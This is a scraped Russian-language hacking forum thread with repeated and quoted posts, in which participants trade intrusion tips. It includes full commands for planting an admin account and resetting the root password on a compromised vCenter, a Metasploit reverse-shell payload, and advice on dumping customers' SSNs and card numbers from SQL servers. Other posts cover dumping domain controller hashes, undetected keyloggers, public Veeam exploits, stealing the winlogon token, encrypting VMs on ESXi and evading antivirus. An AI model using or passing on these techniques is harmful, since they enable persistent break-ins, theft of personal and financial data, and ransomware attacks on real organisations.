получил шелл (pseudo shell) в вцентре, но он не интерактивный, т.е. не могу изменить пароль добавть юзера итд. декриптнуть пассы по мануалу с гита тоже не могу из за неполноценного шелла. что можно сделать в таком случае ? права рут
Можно всю, может имел ввиду какю нужно тянуть?всем привет
подскажите пожалуйста
какую информацию можно тянуть с SQL в сетке
может кто то даст источник,где смогу почитать(без воды)буду очень благодарен)
можно onliner'ами попробовать сменитьполучил шелл (pseudo shell) в вцентре, но он не интерактивный, т.е. не могу изменить пароль добавть юзера итд. декриптнуть пассы по мануалу с гита тоже не могу из за неполноценного шелла. что можно сделать в таком случае ? права рут
Если нужен ссо юзер, и есть креды от administrator@vsphere.local тогда
/usr/lib/vmware-vmafd/bin/dir-cli user create --account myadmin --first-name myadmin --last-name myadmin --user-password 'Welcome@123'
Enter password for administrator@vpshere.local:
User account [myadmin] created successfully
добавляем в админ группу
/usr/lib/vmware-vmafd/bin/dir-cli group modify --name Administrators --add myadmin
Enter password for administrator@vpshere.local:
Account [myadmin] added to group [Administrators]
Group member [myadmin] added successfully
проверяем
/usr/lib/vmware-vmafd/bin/dir-cli group list --name Administrators
Enter password for administrator@vpshere.local:
CN=myadmin myadmin,cn=users,dc=vpshere,dc=local
Если нужен пользак для самого сервера
# vcenteruser - имя нового аккаунта
# root coredump shellaccess - группы
sudo /usr/sbin/useradd -m -G root coredump shellaccess vcenteruser -p 'fUrNh^$%EjG4br3h56j&5yPre'
# проверяем
grep -in vcenteruser /etc/passwd
grep -in vcenteruser /etc/passwd
42:vcenteruser:x:1033:100::/home/vcenteruser:/bin/appliancesh
# если нужно сменить шел, чтоыб вы не заходили в выбор аплаянса, а сразу попадали в шел линухи
sudo /usr/bin/chsh -s /bin/bash vcenteruser &> /dev/stdout
# &> /dev/stdout - используется чтобы вывод видеть в интерактивном шеле, так как половина команд не уходит к нам в стдаут
#если не сработало, тогда так
usermod --shell /bin/bash vcenteruser
# проверяем
cat /etc/passwd | grep vcenteruser
# Поменять пароль пользаку в реверс-шеле, можно так
echo "vcenteruser:!zySQf)AZZSn" | sudo /usr/sbin/chpasswd
echo "root:!zySQf)AZZSn" | sudo /usr/sbin/chpasswd
# проверяем
cat /etc/shadow | grep vcenteruser
cat /etc/shadow | grep root
мсф не стучит, брал эксп с гита который грузит реверс шелл (кастрированный). спасибо за наводку, буду пробовать.можно onliner'ами попробовать сменить
Код:Если нужен ссо юзер, и есть креды от administrator@vsphere.local тогда /usr/lib/vmware-vmafd/bin/dir-cli user create --account myadmin --first-name myadmin --last-name myadmin --user-password 'Welcome@123' Enter password for administrator@vpshere.local: User account [myadmin] created successfully добавляем в админ группу /usr/lib/vmware-vmafd/bin/dir-cli group modify --name Administrators --add myadmin Enter password for administrator@vpshere.local: Account [myadmin] added to group [Administrators] Group member [myadmin] added successfully проверяем /usr/lib/vmware-vmafd/bin/dir-cli group list --name Administrators Enter password for administrator@vpshere.local: CN=myadmin myadmin,cn=users,dc=vpshere,dc=local Если нужен пользак для самого сервера # vcenteruser - имя нового аккаунта # root coredump shellaccess - группы sudo /usr/sbin/useradd -m -G root coredump shellaccess vcenteruser -p 'fUrNh^$%EjG4br3h56j&5yPre' # проверяем grep -in vcenteruser /etc/passwd grep -in vcenteruser /etc/passwd 42:vcenteruser:x:1033:100::/home/vcenteruser:/bin/appliancesh # если нужно сменить шел, чтоыб вы не заходили в выбор аплаянса, а сразу попадали в шел линухи sudo /usr/bin/chsh -s /bin/bash vcenteruser &> /dev/stdout # &> /dev/stdout - используется чтобы вывод видеть в интерактивном шеле, так как половина команд не уходит к нам в стдаут #если не сработало, тогда так usermod --shell /bin/bash vcenteruser # проверяем cat /etc/passwd | grep vcenteruser # Поменять пароль пользаку в реверс-шеле, можно так echo "vcenteruser:!zySQf)AZZSn" | sudo /usr/sbin/chpasswd echo "root:!zySQf)AZZSn" | sudo /usr/sbin/chpasswd # проверяем cat /etc/shadow | grep vcenteruser cat /etc/shadow | grep root
P.S. Если какую то команду не находит, типа bash error command not found
ищите исполняемые файлы в /usr/sbin/
P.S2. если ты через мсф пробивал вцентер, лучше используй такой пейлоад, он интерактивный)
set payload payload/cmd/unix/python/meterpreter_reverse_http
сударь, а через какой цве вы получили шелл ?получил шелл (pseudo shell) в вцентре, но он не интерактивный, т.е. не могу изменить пароль добавть юзера итд. декриптнуть пассы по мануалу с гита тоже не могу из за неполноценного шелла. что можно сделать в таком случае ? права рут
сударь, а через какой цве вы получили шелл ?
Номера телефонов работников компании, их клиентов, их ссн, доб, адрес проживание, номера карт, разные чеки, то есть если корпа связана с продажей чего либо и т. д там много интересного есть. Надо смотреть размер бд, читать имена таблиц, колонок бд. Выводить в смд их и смотреть что там. Выводить для начала первые 10-20 результов таблиц к примеру, если видишь интересное дампиш всю таблицу. По времени это не мало, если скуль сервак не один и много бд. И один и тот же скуль сервак может стоять на разных айпишниках, чтобы не запутатся и не дампить одно и тожевсем привет
подскажите пожалуйста
какую информацию можно тянуть с SQL в сетке
может кто то даст источник,где смогу почитать(без воды)буду очень благодарен)
Сдампить все хэшы с дк, если туда есть доступ и ломится по кредам доменных админов и локальных админов. Смотреть куда ходит админ, вернее с какой тачки заходит админ на виим сервак. Blood Hound в помощь. Искать на рабочих столах креды в тхт (и такое бывает), в кипассе. Эффективен кейлоггер, если фудд. Если не пропатчен сервер, пробовать veeam эксплойт паблик с гитаподскажите если VEAM сервер в воркгрупп,какие методы можно попробовать пробить его?
нет нету, это фул админ машинный с фул правами, и если я не ошибаюсь у него даже эти привелегии не отобрать, точнее можно но мутрно.Есть ли какие-то ограничения у пользователя vpxuser при шифровании вмок на esxi?
Понятно что можно сбросить права от рута и зайти под ним, но это долго если хостов много
Может ли ему где-то не хватить прав на запись или все ок?
я тоже хочу CVE ))))Скрытое содержимое
все есть на гитея тоже хочу CVE ))))
спасибо)броНомера телефонов работников компании, их клиентов, их ссн, доб, адрес проживание, номера карт, разные чеки, то есть если корпа связана с продажей чего либо и т. д там много интересного есть. Надо смотреть размер бд, читать имена таблиц, колонок бд. Выводить в смд их и смотреть что там. Выводить для начала первые 10-20 результов таблиц к примеру, если видишь интересное дампиш всю таблицу. По времени это не мало, если скуль сервак не один и много бд. И один и тот же скуль сервак может стоять на разных айпишниках, чтобы не запутатся и не дампить одно и тоже
есть точно возможность украсть токен у винлогона и создать процесс с этим токеном.все привет подскажите пожалуйста
тестирую что то типо бэкдора и есть одна проблема
я в cmd,пишу whoami высвечиватеся что я админ
могу ли я именно с помощью команда стать системой ?
или прейти в пш от системы ?
runas не работает
может кто-то напишет команду через runas иначе,попробую
спасибо
echo "CVE-XXXX-XXXX" | tee FUD.exeкак закинуть cve в exe что бы антивирус не ругался.
еще один вопросик, а можно ли обойти алерты ? просто когда закидываю на комп сразу летит алерт и ав удалает еёecho "CVE-XXXX-XXXX" | tee FUD.exe